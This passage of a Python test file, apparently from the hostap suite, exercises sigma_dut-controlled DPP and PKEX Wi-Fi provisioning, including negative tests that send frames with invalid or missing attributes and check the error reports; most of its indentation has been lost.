if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_init_configurator_tcp(dev, apdev):
"""sigma_dut DPP/PKEX initiator as Configurator (TCP)"""
check_dpp_capab(dev[0], min_ver=3)
check_dpp_capab(dev[1], min_ver=3)
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_CONTROLLER_START"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to start Controller")
id1 = dev[1].dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6,DPPOverTCP,127.0.0.1")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_pkex_resp_start_on_v1(dev):
while True:
ev = dev.wait_event(["DPP-RX"], timeout=5)
if ev is None:
return
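        # Public Action frame type 7 is the PKEX v1 Exchange Request, i.e.,
        # the initiator has fallen back from PKEXv2; only then add the v1
        # responder.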
if "type=7" in ev:
logger.info("Starting PKEXv1 responder in a thread")
id1 = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
return
def test_sigma_dut_dpp_pkexv2_init_fallback_to_v1(dev, apdev):
"""sigma_dut DPP/PKEXv2 initiator and fallback to v1"""
check_dpp_capab(dev[0], min_ver=3)
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
t = threading.Thread(target=dpp_pkex_resp_start_on_v1, args=(dev[1],))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,30",
timeout=31)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_v1_only(dev, apdev):
"""sigma_dut DPP/PKEX as v1 only initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
id1 = dev[1].dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEXv1,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_v1_only_responder(dev, apdev):
"""sigma_dut DPP/PKEX as v1 only responder"""
run_sigma_dut_dpp_pkex_responder(dev, apdev, v1=True)
def test_sigma_dut_dpp_pkex_responder(dev, apdev):
"""sigma_dut DPP/PKEX as responder"""
run_sigma_dut_dpp_pkex_responder(dev, apdev)
def dpp_init_enrollee_pkex(dev):
logger.info("Starting DPP PKEX initiator/enrollee in a thread")
time.sleep(1.5)
id = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d init=1 role=enrollee identifier=test code=secret" % id
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to initiate DPP PKEX")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=15)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def run_sigma_dut_dpp_pkex_responder(dev, apdev, v1=False):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" %
dev[0].ifname)
t = threading.Thread(target=dpp_init_enrollee_pkex, args=(dev[1],))
t.start()
dppbs = "PKEXv1" if v1 else "PKEX"
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,%s,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,16" % dppbs, timeout=20)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf(dev, id1, conf, conf_id, extra):
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id1, conf, extra, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_ap_dpp_qr(dev, apdev, params):
"""sigma_dut controlled AP (DPP)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-dpp", "sta-dpp")
def test_sigma_dut_ap_dpp_qr_legacy(dev, apdev, params):
"""sigma_dut controlled AP (legacy)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk",
extra="pass=%s" % to_hex("qwertyuiop"))
def test_sigma_dut_ap_dpp_qr_legacy_psk(dev, apdev, params):
"""sigma_dut controlled AP (legacy)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk",
extra="psk=%s" % (32*"12"))
def run_sigma_dut_ap_dpp_qr(dev, apdev, params, ap_conf, sta_conf, extra=""):
check_dpp_capab(dev[0])
logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_qr.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,program,DPP")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id1 = dev[0].dpp_qr_code(uri)
t = threading.Thread(target=dpp_init_conf,
args=(dev[0], id1, ap_conf, conf_id, extra))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6")
t.join()
if "ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
id1 = dev[1].dpp_bootstrap_gen(chan="81/1", mac=True)
uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1)
id0b = dev[0].dpp_qr_code(uri1)
dev[1].set("dpp_config_processing", "2")
cmd = "DPP_LISTEN 2412"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id0b, sta_conf, extra, conf_id)
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to initiate DPP Authentication")
dev[1].wait_connected(timeout=20)
sigma_dut_cmd_check("ap_reset_default")
finally:
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_offchannel(dev, apdev, params):
"""sigma_dut controlled AP doing DPP on offchannel"""
check_dpp_capab(dev[0])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,program,DPP")
sigma_dut_cmd_check("ap_preset_testparameters,Program,DPP,Oper_Chn,3")
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
if "C:81/3;" not in uri:
raise Exception("Unexpected channel in AP's URI: " + uri)
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[0].dpp_bootstrap_gen(chan="81/7", mac=True)
uri0 = dev[0].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[0].set("dpp_configurator_params",
"conf=ap-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
dev[0].dpp_listen(2442)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6")
if "ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
id1 = dev[1].dpp_bootstrap_gen(chan="81/1", mac=True)
uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1)
id0b = dev[0].dpp_qr_code(uri1)
dev[1].set("dpp_config_processing", "2")
cmd = "DPP_LISTEN 2412"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp ssid=%s configurator=%d" % (id0b, to_hex("DPPNET01"), conf_id)
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to initiate DPP Authentication")
dev[1].wait_connected(timeout=20)
sigma_dut_cmd_check("ap_reset_default")
finally:
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_pkex_responder(dev, apdev, params):
"""sigma_dut controlled AP as DPP PKEX responder"""
check_dpp_capab(dev[0])
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_pkex_responder.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_pkex_responder(dev, apdev)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_pkex_v1_responder(dev, apdev, params):
"""sigma_dut controlled AP as DPP PKEXv1 responder"""
check_dpp_capab(dev[0])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_pkex_responder(dev, apdev, v1=True)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf_pkex(dev, conf_id, check_config=True):
logger.info("Starting DPP PKEX initiator/configurator in a thread")
time.sleep(1.5)
id = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d init=1 conf=ap-dpp configurator=%d code=password" % (id, conf_id)
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to initiate DPP PKEX")
if not check_config:
return
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=15)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def run_sigma_dut_ap_dpp_pkex_responder(dev, apdev, v1=False):
sigma_dut_cmd_check("ap_reset_default,program,DPP")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[0], conf_id))
t.start()
dppbs = "PKEXv1" if v1 else "PKEX"
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,%s,DPPPKEXCode,password,DPPTimeout,16,DPPWaitForConnect,No" % dppbs,
timeout=20)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_ap_dpp_pkex_responder_tcp(dev, apdev, params):
"""sigma_dut controlled AP as DPP PKEX responder (TCP)"""
check_dpp_capab(dev[0], min_ver=3)
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_pkex_responder_tcp(dev, apdev)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf_pkex_tcp(dev, conf_id, check_config=True):
logger.info("Starting DPP PKEX initiator/configurator in a thread")
time.sleep(1.5)
id = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d tcp_addr=127.0.0.1 init=1 conf=ap-dpp configurator=%d code=password" % (id, conf_id)
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to initiate DPP PKEX")
if not check_config:
return
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def run_sigma_dut_ap_dpp_pkex_responder_tcp(dev, apdev):
sigma_dut_cmd_check("ap_reset_default,program,DPP")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
t = threading.Thread(target=dpp_init_conf_pkex_tcp, args=(dev[0], conf_id))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPOverTCP,yes,DPPTimeout,6,DPPWaitForConnect,No", timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_dpp_pkex_responder_proto(dev, apdev):
"""sigma_dut controlled STA as DPP PKEX responder and error case"""
check_dpp_capab(dev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_pkex_responder_proto(dev, apdev)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_pkex_responder_proto(dev, apdev):
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
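    # dpp_test=44 enables a testing behavior in wpa_supplicant that interrupts
    # the PKEX exchange on the initiator side, so sigma_dut (responder) is
    # expected to time out during bootstrapping.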
dev[1].set("dpp_test", "44")
t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[1], conf_id,
False))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6", timeout=10)
t.join()
if "BootstrapResult,Timeout" not in res:
raise Exception("Unexpected result: " + res)
def dpp_proto_init(dev, id1):
time.sleep(1)
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp configurator=%d" % (id1, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
def test_sigma_dut_dpp_proto_initiator(dev, apdev):
"""sigma_dut DPP protocol testing - Initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
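    # Each tuple: (DPPStep, DPPFrameType, DPPIEAttribute, expected sigma_dut
    # result, expected DPP-FAIL reason on the peer or None).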
tests = [("InvalidValue", "AuthenticationRequest", "WrappedData",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("InvalidValue", "AuthenticationConfirm", "WrappedData",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("MissingAttribute", "AuthenticationRequest", "InitCapabilities",
"BootstrapResult,OK,AuthResult,Errorsent",
"Missing or invalid I-capabilities"),
("InvalidValue", "AuthenticationConfirm", "InitAuthTag",
"BootstrapResult,OK,AuthResult,Errorsent",
"Mismatching Initiator Authenticating Tag"),
("MissingAttribute", "ConfigurationResponse", "EnrolleeNonce",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
"Missing or invalid Enrollee Nonce attribute")]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result,
fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result, fail):
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr),
timeout=10)
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_responder(dev, apdev):
"""sigma_dut DPP protocol testing - Responder"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("MissingAttribute", "AuthenticationResponse", "DPPStatus",
"BootstrapResult,OK,AuthResult,Errorsent",
"Missing or invalid required DPP Status attribute"),
("MissingAttribute", "ConfigurationRequest", "EnrolleeNonce",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
"Missing or invalid Enrollee Nonce attribute")]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result,
fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result, fail):
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_initiator(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at RX on Initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("AuthenticationResponse",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("ConfigurationRequest",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
None)]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail):
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame))
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at TX on Initiator/Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("AuthenticationConfirm",
"BootstrapResult,OK,AuthResult,Errorsent,LastFrameReceived,AuthenticationResponse",
None)]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame, result,
fail):
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10)
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_responder(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at RX on Responder"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("AuthenticationRequest",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("AuthenticationConfirm",
"BootstrapResult,OK,AuthResult,Errorsent",
None)]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail):
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def dpp_proto_init_pkex(dev):
time.sleep(1)
logger.info("Starting DPP PKEX initiator/configurator in a thread")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d init=1 conf=sta-dpp configurator=%d code=secret" % (id, conf_id)
if "FAIL" in dev.request(cmd):
raise Exception("Failed to initiate DPP PKEX")
def test_sigma_dut_dpp_proto_initiator_pkex(dev, apdev):
"""sigma_dut DPP protocol testing - Initiator (PKEX)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("InvalidValue", "PKEXCRRequest", "WrappedData",
"BootstrapResult,Errorsent",
None),
("MissingAttribute", "PKEXExchangeRequest", "FiniteCyclicGroup",
"BootstrapResult,Errorsent",
"Missing or invalid Finite Cyclic Group attribute"),
("MissingAttribute", "PKEXCRRequest", "BSKey",
"BootstrapResult,Errorsent",
"No valid peer bootstrapping key found")]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr, result, fail):
id1 = dev[1].dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr))
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_responder_pkex(dev, apdev):
"""sigma_dut DPP protocol testing - Responder (PKEX)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("InvalidValue", "PKEXCRResponse", "WrappedData",
"BootstrapResult,Errorsent",
None),
